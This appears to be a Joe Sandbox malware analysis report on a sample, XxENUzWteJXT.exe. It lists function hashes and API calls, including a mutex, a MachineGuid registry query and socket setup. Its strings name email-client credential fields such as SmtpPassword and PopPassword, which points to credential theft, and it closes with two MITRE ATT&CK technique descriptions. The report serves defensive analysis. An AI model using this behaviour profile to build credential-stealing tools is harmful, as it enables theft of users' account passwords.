Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb4b8c9c761b309eea782892178fee7b073b16a1c50dd7ae67fde1644c13e6a
Instruction ID: ebe9624fc9e59a693e8a0849e678a9a34f2e0f0a9d39290705faa31baf9d3dfc
Opcode Fuzzy Hash: 5fb4b8c9c761b309eea782892178fee7b073b16a1c50dd7ae67fde1644c13e6a
Instruction Fuzzy Hash: 33016D35818224CFDB64CF64D8147ECBBB1BB09311F0442EA8A0EA2390C731AAC5CF10

Function 01F50B88 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31536bfb1f04de9dcedaa1a37a8290a4ddd480df26903f773bf646faffcf0755
Instruction ID: 431b68f9a1b4fc6f1b581f86ceef28c534cb7d69b1eb9a20f8f65b4689e2da11
Opcode Fuzzy Hash: 31536bfb1f04de9dcedaa1a37a8290a4ddd480df26903f773bf646faffcf0755
Instruction Fuzzy Hash: B7F0B470C05304EFDB54DFA5D8945ACBBB4BB4A311F1496AAD809D3285EF350500CF01

Function 01F50B90 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c387edff75aa7d6a95c641041da97540a7302aee3307fccda561dd98c676d0
Instruction ID: 1483add762d3ffef75ec5d82d840aecd946fe22f52108999f947a0b27bdda35b
Opcode Fuzzy Hash: 38c387edff75aa7d6a95c641041da97540a7302aee3307fccda561dd98c676d0
Instruction Fuzzy Hash: 2AF05E71D01308EFDB58DFA9D9846ACBBB5BB8A315F1496AAD919E3284DB350A00CF00

Function 01F50B98 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d393fefa1f52efccad0a3cdef6affa94eae1a0bf4da82a23213b95fa550c37e
Instruction ID: 05e5a25c74f5205e08fd69e41faed6b1329deb5c180e2aa73272b86886b446dd
Opcode Fuzzy Hash: 4d393fefa1f52efccad0a3cdef6affa94eae1a0bf4da82a23213b95fa550c37e
Instruction Fuzzy Hash: 97F06D70D05308EFD758DFA9E9846ADBBB8BB89301F1495AAD809E3344DF301A00CF40

Function 01F500D0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e15ea747607b8e79f1167d850edcbde24e7b7a69c88580a1dc3d9ea430ac2c
Instruction ID: 8b1884aa7c87989565fe27d95ff134df7174d61af4f0b50aa3c7f8c990386f02
Opcode Fuzzy Hash: 13e15ea747607b8e79f1167d850edcbde24e7b7a69c88580a1dc3d9ea430ac2c
Instruction Fuzzy Hash: 4BE0DF309AA208DFCB40CF64DC442FC7FB5EB47310F2011EADC0892211CA351E9AEB45

Function 01F5173F Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0d14779381f383ad5518252fe4647d87f060c15e4549080ad6183fb11f68ab
Instruction ID: 143c83f8b11cd12550e688be5678b0d4937876ca1067c19d778dbf0501da6570
Opcode Fuzzy Hash: 8b0d14779381f383ad5518252fe4647d87f060c15e4549080ad6183fb11f68ab
Instruction Fuzzy Hash: 79F06D35909118CFDB24CF54C944BF8BBF5FB0A305F0841EAC80997256D731AA46CF10

Function 01F505F8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c1d40cc90ae3610b1041944b8ca40bdd4dfa68f49642b1cbeb9280c27ecaa2
Instruction ID: 390c49f8756b0e2951bafa2f28e94287b1a51eadf7da0bf3d13b5bfaf1dbcb1a
Opcode Fuzzy Hash: 80c1d40cc90ae3610b1041944b8ca40bdd4dfa68f49642b1cbeb9280c27ecaa2
Instruction Fuzzy Hash: 5BE04FB0C15249DFDF90EFB8D89429C7FF09B94220F2142BBDD2492391EA314A44CF61

Function 01F500E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26317dd2b4d3aa3f7f70deec74866b309a0bb465146cab3866363b023dac36d7
Instruction ID: 4718358afea96607d721a720a35f1dd5d675e6c0c9cdfe1627aa42fc27b01450
Opcode Fuzzy Hash: 26317dd2b4d3aa3f7f70deec74866b309a0bb465146cab3866363b023dac36d7
Instruction Fuzzy Hash: 22D05E70C9E208DBD704DFA8DD516BCBFBDAB46300F1051AADD4D23341CE312A46EA96

Function 01F51D40 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05f65f0e1d67fda7dfe77d72e0e3b8e6d18d1468d521f806a80dc2bffc6eaf7
Instruction ID: 86d3be3337013943379081b69f18ecb6aac523483410e880cd7424a5f66de077
Opcode Fuzzy Hash: a05f65f0e1d67fda7dfe77d72e0e3b8e6d18d1468d521f806a80dc2bffc6eaf7
Instruction Fuzzy Hash: 3BE0C2B0C06204CFDB91FFB8A96031D7BB09F41601F5001EECD0852220E6358A64CB92

Function 01F5131A Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1d792bc6781231c4acf5be54b2ad2c8dc1f3274d12e53ce29bd2223012f0d7
Instruction ID: dc02ff92e81cb219f382c5dbd96bbe30407e3340fa8e193dafb008dca23a795a
Opcode Fuzzy Hash: af1d792bc6781231c4acf5be54b2ad2c8dc1f3274d12e53ce29bd2223012f0d7
Instruction Fuzzy Hash: 4CE0E575904258DFDB44CF94CC80BE8B7B9AB48301F2480999509A7281C732AE85CF10

Function 01F50671 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a35d9f2df8f72b882e020291f8b01fd584d00f9fc8ed01032c5ba99ee5d440
Instruction ID: 7de4991fc314f8ab709d2f65fbdb9ea188d8a92ecfcb1aa82181c15aaf86d586
Opcode Fuzzy Hash: 55a35d9f2df8f72b882e020291f8b01fd584d00f9fc8ed01032c5ba99ee5d440
Instruction Fuzzy Hash: D2E08C70886348DFD3958BA89850AAC3BB49B82234F0502AEC4109B1E2E6690940CB21

Function 01F51D48 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90ae206dcc08f1c81c49c2810d77b08fd4e2306a1df2c185b52f74e2b4ec14a
Instruction ID: 45ee18c6434811099024feb58e3d69a5eb7f6894e50dd7d863c23b98f64215a3
Opcode Fuzzy Hash: a90ae206dcc08f1c81c49c2810d77b08fd4e2306a1df2c185b52f74e2b4ec14a
Instruction Fuzzy Hash: A6D01770C162089EDB51FFB8A86679D7FB0DB41204F1042AACA0892691EA354A44CB82

Function 01F50600 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601a0ecd2e785ab5deb1f151439ef5786356a026de9113391693c25916c842eb
Instruction ID: 8935db4d901328ee51acdf6f73df7364c6d517f9b2ef4f127aa109e041828658
Opcode Fuzzy Hash: 601a0ecd2e785ab5deb1f151439ef5786356a026de9113391693c25916c842eb
Instruction Fuzzy Hash: 3BE0ECB0D11209DFDF94EFBCD98529DBFF0EB84220F2142BAD92592390E6314A80CF51

Function 01F51368 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf07879e9f14d076c54025508da927d7fceabf6e97bb6ef228a1b452257ea12
Instruction ID: 7a486c7bdef2da2119560628ebd98d0e46ea7008fe34b046bd42f77f8c42342a
Opcode Fuzzy Hash: 7cf07879e9f14d076c54025508da927d7fceabf6e97bb6ef228a1b452257ea12
Instruction Fuzzy Hash: 6DE04F3540D2D09FCB81CB34CC983A4BFB05B42201F2884EE8489EA293D6395689CB01

Function 01F50608 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21086554f41b9a7e5b84a6a45fe1323e297dab25363bc02a81e07b8fafd3b932
Instruction ID: 72d1dbb826183d00ccd9ef79f050d4c0c6d41c63a6b73cf323e87f91b5db4637
Opcode Fuzzy Hash: 21086554f41b9a7e5b84a6a45fe1323e297dab25363bc02a81e07b8fafd3b932
Instruction Fuzzy Hash: B0D06770D11209EFDB84EFACE99579DBFF4AB44601F2041BADD4893350EA315B54CB91

Function 01F51D50 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d082ae9145265a7a5337cf8e4d2389b7b0b8c11d6620ebd4f5018ca7140829
Instruction ID: c39823afd744eb88e8432ca208ca78709eb553974b88b9ed6ccc543d30d537f1
Opcode Fuzzy Hash: 45d082ae9145265a7a5337cf8e4d2389b7b0b8c11d6620ebd4f5018ca7140829
Instruction Fuzzy Hash: A1D0A930C0220CDBDB40FFBCE85575DBBB8EB00200F1001AACE0893240EA309A00CB92

Function 01F515B4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c37e7df1a3dd331efa7ebdcf69013382895961100b8a9b1ebd0acda6c725d0f1
Instruction ID: c78840b042bbfe39941cca1469fa3a67c90dd00969fe9c7c50ea2c68602f4955
Opcode Fuzzy Hash: c37e7df1a3dd331efa7ebdcf69013382895961100b8a9b1ebd0acda6c725d0f1
Instruction Fuzzy Hash: 80E04C75A042189FDB55CF94CC91B9CBBB5AB4C310F248099AA0DAB395C6326E82CF40

Function 01F50680 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 666dd71310baf1ec2220375b3a78a147b144b9d7b8dbe327d07de1bacfa5f98b
Instruction ID: 238e286ea3cc9a807084fd7693de8bec5d84723e79aca06a3ec03d7e60ae80f8
Opcode Fuzzy Hash: 666dd71310baf1ec2220375b3a78a147b144b9d7b8dbe327d07de1bacfa5f98b
Instruction Fuzzy Hash: 31C0127081310CDBD714DF9CD951B6D776CD781614F1010A9D90417250DA351900DBA1

Analysis Process: XxENUzWteJXT.exePID: 3796, Parent PID: 3472COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	299
Total number of Limit Nodes:	12

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
EmailAddress, xrefs: 0040D074
PopPort, xrefs: 0040D0A7
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
